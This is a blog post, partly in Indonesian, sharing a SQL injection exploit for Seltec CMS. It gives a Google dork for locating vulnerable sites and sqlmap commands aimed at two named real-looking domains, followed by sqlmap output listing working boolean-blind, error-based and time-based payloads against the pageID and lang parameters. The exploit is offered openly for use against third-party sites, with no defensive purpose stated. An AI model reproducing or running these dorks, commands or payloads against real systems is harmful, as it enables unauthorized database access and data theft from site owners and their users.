Seltec CMS SQL-İnjection Vulnerability tested on Kali Linux


Assalamualaikum Wr.Wb...
dengan diberikan nikmat dan rezeki dari Allah SWT, saya Mr.GagalTotal666 akan
sedikit berbagi kepada anda yaitu tentang Seltec CMS SQL-İnjection Vulnerability.

[+] Exploit Title: Seltec CMS Sql İnjection Vulnerability
[+] Author : TrazeR & Sipahiler & TurkZ.org
[+] Google Dork : intext:"Powered by Seltec CMS & WebDesign" inurl:pageID=
[+] Tested on : Kali Linux 2017, Chrome

GET Parameter 'pageID' İs Vulnerable.

Command 1 :
sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only  --no-cast  -u "http://www.belloy.be/index.php?pageID=63&parentMenuID=2" --batch --dbs

Parameter: pageID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageID=63' AND 4023=4023-- ptkO&parentMenuID=2

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: pageID=63' AND (SELECT 2141 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT (ELT(2141=2141,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vyWK&parentMenuID=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pageID=63' AND SLEEP(5)-- vPuD&parentMenuID=2

Command 2 : sqlmap -u "http://www.vdbroeck.be/?lang=4" --dbs

Parameter: lang (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lang=4' AND 1230=1230 AND 'xBeQ'='xBeQ

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: lang=4' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b707671,(SELECT (ELT(9508=9508,1))),0x7171706b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'tmBU'='tmBU

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: lang=4' AND SLEEP(5) AND 'Dovk'='Dovk



Video tutorial


mohon maaf bila ada kesalahan dan kekurangan atas video nya ^_^
sekian dan semoga bermanfaat...

Wassalamualaikum Wr.Wb...

Previous
Next Post »